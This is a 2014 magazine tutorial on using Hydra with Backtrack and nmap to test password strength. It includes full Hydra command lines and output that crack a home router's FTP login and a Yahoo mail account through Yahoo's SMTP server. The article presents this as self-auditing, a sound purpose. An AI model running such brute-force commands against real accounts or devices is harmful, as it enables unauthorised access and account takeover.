Using Hydra To Crack The Door Open

(1,743 views)

Using Hydra To Crack The Door Open

by Nikolaos Mitropoulos

door-168772_640

Take advantage of a cracking tool to test the resilience of your local or remote network servers and various other devices from a computer to a router on the network.

The complexity of security range from basic computing systems to more intricate industrial systems with biometric locks or weapons like quantum computing that will come into play in the future.

The more important the data is, the tighter the locks must be. The security countermeasures can range from simple to more elaborate as we climb the ladder of importance of the information to be protected. A chain is as only as strong as its weakest link.

fig1.jpg

Figure 1. Base memory size used in VirtualBox installation

If the password of the administrator’s is not secure enough, then the attacker may use privilege escalation to get to the data thwarting any attempt to keep them from the myriads of attackers who seek to gain direct access to them. If upfront, we keep the front door heavily fortified then the malicious persons will go to the next available building to try their luck. Hence, the password strength of your local network access or network devices or even remote servers and other devices is a critical step to prevent attacks. Below highlight some of the rules to achieving e strong passwords. Basic password creation rules:

A minimum password length of 12 to 18 characters.

Include numbers, upper and lower case combinations as well as symbols, if the system allows it.

Avoid names or important personal information that someone else also knows, e.g. your father’s name or your date of birth.

Use password generator (where feasible).

Store them in special applications with master password set and not using post-it notes or handwritten information hidden at your desk.

Change any default passwords.

Make intentional typos that only you know.

Do not use the same password for all your systems.

Change your password frequently.

So, now you know the rules. But how do you ensure that your passwords are strong enough and not too complicated to remember? How can you evaluate the strength of your password? You can use tools, in Backtrack to test your password resilience.

fig2

Figure 2. Hard disk size used in VirtualBox installation

Installing Backtrack on VirtualBox

There are three ways to operate Backtrack.

Install it to your computer.

Run it through a live CD

Install it on a virtual environment as like VirtualBox or Vmware.

I am going to demonstrate how to work with Backtrack installation in VirtualBox. In order to achieve this, you have to download two components:

latest VirtualBox version (can be found at https://www.virtualbox.org/wiki/Downloads)

Bactrack image to use for VirtualBox (can be found at: https://www.backtrack-linux.org/downloads/)

Once you have all the above, you can begin the installation of VirtualBox. Do keep two things in mind. Allow larger memory space and hard disk to be allocated during installation, like you see in the two above screenshots (Figures 1 and 2). I use at least 1024 MB for memory and a hard disk of larger than 10 GB of size. All other settings you can leave to as default. Use the Backtrack .iso to input in this VirtualBox instance and run it to complete the installation process. One last thing, be patient during final installation as you may see the bar slowing at 99%.. Do not abort and you will eventually see the following message: Figure 3.

fig3

Figure 3. Installation completion message from Backtrack

The password tools in Backtrack are located in the following path: Backtrack → Privilege Escalation → Password attacks, as you can also see in Figure 4.

fig4

Figure 4. Backtrack password cracking tools

In our next example we will use nmap, also existing in Backtrack, which is an open tool for network discovery and security auditing. Since this article intent is not to demonstrate nmap usage, I will only tell you that one of the most famous of its features is port scanning. So, if you have a computer or a router or whichever device at the network, you can use its IP address with nmap to see which ports are open on it. I have my router at the local network with IP of 192.168.1.1 and I want to run a port scan on it to see what the open services are. So, I use the command: nmap 192.168.1.1. So, as you can see in Figure 5, my device has TCP ports 21, 23, 53, 80 and 5555 open. Nmap, in this mode, has scanned a total of 1,000 ports.

fig5

Figure 5. Using nmap to perform port scanning at 192.168.1.1 (router’s IP)

I will move on to introducing Hydra, which is a well-known tool for dictionary attacks on various devices (you can find it in sub-path Online Attacks of the pre-mentioned Backtrack structure). Alternatively, if you are using Windows, you can try to download Cygwin and run the tools from there.In this example, I will use Hydra to target my router in order to perform a dictionary attack on the password. I will use a dictionary.txt which I will populate and increase the number of words as time goes by. I have modified it for this demonstration purpose to use 30 passwords. The parameters that Hydra accepts: Listing 1.

Listing 1. Hydra parameters of operation

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [server service [OPT]]|[service://server[:PORT][/OPT]]

Options:

-R restore a previous aborted/crashed session

-S perform an SSL connect

-s PORT if the service is on a different default port, define it here

-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE

-p PASS or -P FILE try password PASS, or load several passwords from FILE

-x MIN:MAX:CHARSET password bruteforce generation, type “-x -h” to get help

-e nsr try “n” null password, “s” login as pass and/or “r” reversed login

-u loop around users, not passwords (effective! implied with -x)

-C FILE colon separated “login:pass” format, instead of -L/-P options

-M FILE server list for parallel attacks, one entry per line

-o FILE write found login/password pairs to FILE instead of stdout

-f exit after the first found login/password pair (per host if -M)

-t TASKS run TASKS number of connects in parallel (default: 16)

-w / -W TIME waittime for responses (32s) / between connects per thread

-4 / -6 prefer IPv4 (default) or IPv6 addresses

-v / -V verbose mode / show login+pass combination for each attempt

-U service module usage details

server the target server (use either this OR the -M option)

service the service to crack. Supported protocols: cisco cisco-enable

cvs firebird ftp[s] http[s]-{head|get} http[s]-{get|post}-form http-proxy

http-proxy-urlenum icq imap irc ldap2 ldap3[-{cram|digest}md5] mssql mysql

ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3 postgres rdp

rexec rlogin rsh sip smb smtp smtp-enum snmp socks5 ssh svn teamspeak

telnet vmauthd vnc xmpp

 

The command string to be used to attack the router along with its arguments is as follow:

hydra -V -l admin -P /root/Desktop/dictionary.txt

-t 36 -f -s 80 192.168.1.1 http-get /

So we are essentially telling Hydra to use the username (which in this scenario will only be admin) and password combination used every time (-V), with username admin (as in most router cases but if we want, another dictionary can be used here for usernames), specifying the password file to be used (-P), we specify number of connections in parallel tasks (-t), exiting after first successful crack (-f), port to be used is 80 (http port which is open as nmap showed earlier), IP address of the router is 192.168.1.1 and protocol is http-get (usually it is either get or post). Notice the character / at the end of the line which specifies to attempt to crack at the root page (it is actually like saying try the login credentials at index.html). The output we get is shown in Figure 6.

fig6

Figure 6. The output of the attempt to crack the password of the router at 192.168.1.1

From what you can see, the password search wasn’t really successful so the program just concludes its execution. As already stated earlier, try to have one basic principle at mind: The better variety and size the original dictionary has, the better the result will be. Let us try a different approach this time by attacking the router’s ftp protocol, using the command string that follows. This time, we tell Hydra to try a null password and to use login credentials as password in addition to what we did earlier.

hydra -V -l admin -P /root/Desktop/dictionary.txt

-e ns -f -s 21 192.168.1.1 ftp

If you are not a command line addict, you can use the GUI version of Hydra. For instance, checking on the parameters will represent the same settings as the above command line: Figure 7 and Figure 8.

fig7

Figure 7. Hydra settings in target tab

fig8

fig8-9_1

fig8-9_2

Figure 8. Hydra settings in passwords tab

If you want to change the task number you can use the Tuning Tab and as you soon as you set everything go to the Start tab and begin the application. After, that you can save your output for future inspection.
For example, I have the below output from my test:

While the two additional lines at the end state:

[ATTEMPT] target 192.168.1.1 – login “admin” – pass “enti4752”

[21] [ftp] host: 192.168.1.1 login: admin password: enti4752

So to verify that this is indeed true, I will ftp to 192.168.1.1 using “admin” as username and “enti4752” as password.

fig9

Figure 9. Connecting through ftp to 192.168.1.1

Let’s see one more example of using Hydra but this time to crack yahoo mail accounts (same logic applies to gmail or hotmail or all other mail servers). We use the following settings:

Simple target: smtp.mail.yahoo.com (Yahoo server)

Protocol: smtp

Port: 465

Enable also: SSL, verbose and show attempts.

The name that we specify as target is the mail account that we are attempting to crack, so in my example I put my account and I also specified a dictionary for the attack, which is the same one that I have been using throughout this presentation (Figure 10 and Figure 11).

fig10

Figure 10. Hydra Target tab settings for cracking yahoo passwords

fig11

Figure 11. Hydra Passwords tab settings for cracking yahoo passwords

If we choose now to start Hydra you will notice an output as the one in Figure 12. I have shortened the dictionary to limit the time to execute as well as to shorten the output in order to focus at the result.

fig12

Figure 12. Attacking yahoo mail account and revealing the password

While an additional line at the end will state:

[25] [smtp] host: 188.125.69.59 login:

[email protected] password: backtrack

If I use the above credentials I will be able to successfully login to my mail account using the standard web page at https://login.yahoo.com/.

Summary

The above article clearly shows how easy it is to target system. We have used nmap as a network scanner, and the supporting protocols and functions of Hydra.

As we already stated through the course of this article, when dealing with dictionary attacks, the tools are as strong as their internal dictionaries and also the processing power that someone has at his disposal in order to combine the dictionary attack with proper brute force cracking capability. There are also a lot of other tools in Backtrack which include online and offline password cracking such as rainbowcrack, John the Ripper, medusa, ncrack and much more others that are worth dissecting in other articles.

For instance, John the Ripper has the ability to crack password hashes, so if we get the hashed contents of a password file, the application can discover the initial plain text form through a variety of hashed passwords. You will be amazed that many people still use default passwords or just simple words as passwords.

Never underestimate how simple-minded users or system administrators can be. I am sure you can remember the old movie “Hackers,” the passwords referenced are: “love,” “secret,” “sex” and “God.” You wouldn’t believe how many people use these words as their passwords.

About the Author

nmNikolaos Mitropoulos has been working for over a year as a network security engineer for AT&T’s Managed Security Services team. He is Cisco and Juniper certified (holding CCNA, JNCIA and JNCIS-SEC certifications). In the past four years he has focused in teaching at various education levels varying from professor of secondary education level courses to demanding corporate classes for professionals dealing in multiple aspects of the networking and security fields. His hobbies are steganography, digital watermarking and building penetration testing skills.

 

September 2, 2014
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2023
What certifications or qualifications do you hold?
Max. file size: 150 MB.
What level of experience should the ideal candidate have?
What certifications or qualifications are preferred?

Download Free eBook

Step 1 of 4

Name(Required)

We’re committed to your privacy. Hakin9 uses the information you provide to us to contact you about our relevant content, products, and services. You may unsubscribe from these communications at any time. For more information, check out our Privacy Policy.